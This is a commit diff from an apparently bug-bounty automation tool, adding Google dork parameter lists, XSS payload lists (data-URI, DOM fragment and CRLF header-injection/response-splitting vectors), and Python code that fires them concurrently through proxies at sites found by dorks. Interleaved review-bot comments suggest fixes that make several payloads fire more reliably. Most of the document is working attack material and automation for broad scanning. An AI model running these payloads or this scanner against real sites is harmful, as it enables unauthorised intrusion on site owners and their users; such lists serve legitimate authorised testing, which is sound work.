
fix bugs + improve xss
ElNiak committed Jul 14, 2024
1 parent 8981eb8 commit d06a0c8
Showing 72 changed files with 838 additions and 381 deletions.
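--- a/README.md
+++ b/README.md
@@ -173,4 +173,5 @@ Also watch module for more specfic TODOs:
 | /_admrus/ /_admrusr/ /publicite/www/delivery/
 | /signaler-contenu-illicite.html* /desabo/ /optins/preferences/ /php/ /php/ajax/*
 | /feuilletables/ /iframe/ /newsletters/
-|_/jeu-nouveau-rustica-bien-etre/ /concours/ /popunder/ /popup/
+|_/jeu-nouveau-rustica-bien-etre/ /concours/ /popunder/ /popup/
+* https://github.com/dwisiswant0/findom-xss/blob/master/findom-xss.sh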
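--- a/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt
+++ b/bounty_drive/attacks/dorks/google/xss/XSS-Dork.txt
@@ -104,4 +104,4 @@ intext:"<a href='#' onclick='
 intext:"<div onmouseover=
 intext:"<img src='x' onerror=
 intext:"<input type='text' onblur=
-intext:"<select onchange='
+intext:"<select onchange='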
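--- a/bounty_drive/attacks/dorks/google/xss/xss-parameters.txt
+++ b/bounty_drive/attacks/dorks/google/xss/xss-parameters.txt
@@ -23,3 +23,43 @@
 ?login=
 ?begindate=
 ?enddate=
+?id=
+?url=
+?search=
+?query=
+?cmd=
+?z=
+?q=
+?l=
+?r=
+?searchstring=
+?keyword=­
+?file=
+?years=
+?txt=
+?tag=
+?max=
+?from=
+?author=
+?pass=
+?feedback­=
+?mail=
+?cat=
+?vote=
+?sid=
+?msg=
+?category=
+?PID=
+?search_keywords=
+?mid=
+?catid=
+?pid=
+?order_direction=
+?course_id=
+?session=
+?sfunction=
+?search_keywords=
+?site=
+?errmsg=
+?decl_id=
+?num=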
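Review bot: Two of the added entries carry an invisible soft hyphen (U+00AD) — `?keyword=­` and `?feedback­=` — so whatever consumes this list will never match the real parameter names `keyword` and `feedback`; retype them as `?keyword=` and `?feedback=`. `?search_keywords=` is added twice, and `?PID=` / `?pid=` only differ in case, which matters or not depending on whether the dork builder (not visible here) compares case-insensitively. A short leading comment stating the format (one `?name=` per line, ASCII only, no duplicates) would make this kind of paste artifact easier to spot in review.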
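--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/dcp-xss-payload-list.txt
@@ -0,0 +1,16 @@
+<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]
+<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]
+0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))
+<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a
+<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
+<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>
+<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">
+<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>
+<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​
+data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]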
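Review bot: The second-to-last `<object>` payload ends with a zero-width space (U+200B) after `</object>`, a paste artifact that will be sent as part of the payload and can defeat exact-reflection matching; strip it. The `[B64]…[B64]` markers and the `history.back()` calls presume a consumer that base64-encodes the delimited segment (the `base64_encoder` passed around in xss.py suggests one exists, but its handling of the markers isn't visible here), and the first two lines close the marker outside the quoted attribute (`"></a>[B64]`) while every other line closes it inside, so either the convention tolerates that or those two vectors will be encoded wrongly. A one-line header comment documenting the marker convention — which segment is encoded and where `PAYLOAD` is substituted — would let the next contributor add entries without reverse-engineering the encoder.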
14 changes: 14 additions & 0 deletions bounty_drive/attacks/xss/payloads/dom-xss-payload-list.txt
@@ -1,3 +1,17 @@
Y#<script>alert('PAYLOAD')</script>
Y#<%<!--'%><script>alert(PAYLOAD);</script -->
Y#<script ^__^>alert(PAYLOAD)</script ^__^
Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>
Y#<script>+-+-1-+-+alert(PAYLOAD)</script>
Y#<script x> alert(PAYLOAD) </script 1=2
Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">
Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>
Y#%00“><script>alert(PAYLOAD)</script>
Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E
Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E
Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>
Y#%3Cscript>javascript:alert(PAYLOAD)</script>
Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>
"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
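Review bot: The new `Y#…` lines call `alert(PAYLOAD)` unquoted, whereas the existing first line and the dcp/http lists use `alert('PAYLOAD')` / `alert("PAYLOAD")`; if the substitution value is a non-numeric marker string the unquoted form throws a ReferenceError instead of firing, so either quote consistently or confirm the substituted token is always a bare integer. `Y#%00“><script>alert(PAYLOAD)</script>` contains a typographic quote (U+201C) where a `"` was clearly intended, so that vector never closes the attribute it targets. The `Y#` fragment-prefix convention isn't documented in the file; a leading comment such as `# entries are appended to the URL as a fragment (location.hash sink); PAYLOAD is replaced at send time` would help. The file continues below the hunk, so the remaining entries may already settle the quoting convention.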
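--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/http-header-xss-payload-list.txt
@@ -0,0 +1,11 @@
+%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;
+PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>
+%0D%0ASet-Cookie%3APAYLOAD
+%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E
+%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com
+%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E
+%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E
+%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
+%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
+%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1
+%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-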
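Review bot: The first payload has its angle brackets HTML-entity-encoded (`&lt;html&gt;PAYLOAD&lt;/html&gt;`), almost certainly copied from a rendered web page; as written it injects literal entity text rather than markup and should read `<html>PAYLOAD</html>` like the later lines. The hard-coded `Content-Length` values (`16`, `29`) don't match the bodies that follow them (`<html>PAYLOAD</html>` is 20 bytes before substitution and the length changes again once `PAYLOAD` is replaced), so the response-splitting variants only work by accident; either compute the length when the payload is built or drop the header. These are CRLF-injection / response-splitting probes that only fire if the target decodes `%0d%0a` before writing a header, and several lines mix raw spaces and `%20` (e.g. `Content-Type: text/html`), which a URL-encoding consumer may re-encode differently; a header comment stating that entries are sent pre-encoded, with `PAYLOAD` substituted verbatim, would pin that down.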
68 changes: 54 additions & 14 deletions bounty_drive/attacks/xss/xss.py
Expand Up @@ -59,6 +59,7 @@ def test_xss_target(url, proxy, config, dork_id, link_id, attack_id):
"Accept-Encoding": "gzip,deflate",
"Connection": "close",
"cache-control": "max-age=0",
"Referer": "127.0.0.1",
"DNT": "1",
"Upgrade-Insecure-Requests": "1",
}
Expand Down Expand Up @@ -195,22 +196,44 @@ def launch_xss_attack(config):
scheme = urlparse(website).scheme
host = urlparse(website).netloc
main_url = scheme + "://" + host
print(f"Main URL: {main_url}")
print(f"Forms: {forms}")
print(f"DOM URLS: {domUrls}")
print(f"zip(forms, domUrls): {list(zip(forms, domUrls))}")
for form, domURL in list(zip(forms, domUrls)):
search_tasks_with_proxy.append(
{
"main_url": main_url,
"form": form,
"scheme": scheme,
"host": host,
"domURLs": domURL,
"proxy": proxy,
}
if main_url != "://":
cprint(
f"Main URL: {main_url}",
color="yellow",
file=sys.stderr,
)
cprint(
f"Forms: {forms}",
color="yellow",
file=sys.stderr,
)
cprint(
f"DOM URLS: {domUrls}",
color="yellow",
file=sys.stderr,
)
cprint(
f"zip(forms, domUrls): {list(zip(forms, domUrls))}",
color="yellow",
file=sys.stderr,
)
for form, domURL in list(zip(forms, domUrls)):
search_tasks_with_proxy.append(
{
"main_url": main_url,
"form": form,
"scheme": scheme,
"host": host,
"domURLs": domURL,
"proxy": proxy,
}
)

search_tasks_with_proxy = [
i
for n, i in enumerate(search_tasks_with_proxy)
if i not in search_tasks_with_proxy[n + 1 :]
]
cprint(
f"Total XSS Targets: {len(search_tasks_with_proxy)}",
color="yellow",
Expand All @@ -224,6 +247,20 @@ def launch_xss_attack(config):
with open("attacks/xss/payloads/blind-xss-payload-list.txt", "r") as f:
blindPayloads = f.readlines()

domPayloads = []
with open("attacks/xss/payloads/dom-xss-payload-list.txt", "r") as f:
domPayloads = f.readlines()

dcpPayloads = []
with open("attacks/xss/payloads/dcp-xss-payload-list.txt", "r") as f:
dcpPayloads = f.readlines()

httpPayloads = []
with open(
"attacks/xss/payloads/http-header-xss-payload-list.txt", "r"
) as f:
httpPayloads = f.readlines()

encoding = base64_encoder if config["encode_xss"] else False
with concurrent.futures.ThreadPoolExecutor(
max_workers=number_of_worker
Expand All @@ -236,6 +273,9 @@ def launch_xss_attack(config):
task["main_url"],
task["form"],
blindPayloads,
dcpPayloads,
httpPayloads,
domPayloads,
encoding,
config,
task["proxy"],
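Review bot: The guard `if main_url != "://":` only rejects the case where both scheme and netloc are empty; an entry like `http:` or a host-only string still yields `http://` or `://host` and is queued as a target. Testing the parsed parts directly, `if scheme and host:`, states the intent and covers both cases. The four `readlines()` calls keep the trailing newline on every payload (and the new dcp list ends one line with a zero-width space), so unless `test_xss_target` strips them — not visible from here — each payload is sent with `\n` appended; `f.read().splitlines()` at load time avoids that. The O(n²) dedup `i not in search_tasks_with_proxy[n + 1 :]` compares whole dicts including `proxy`, so the same form reached through different proxies is kept as separate targets — fine if intended, worth a comment if so. `launch_xss_attack` starts and ends outside this hunk.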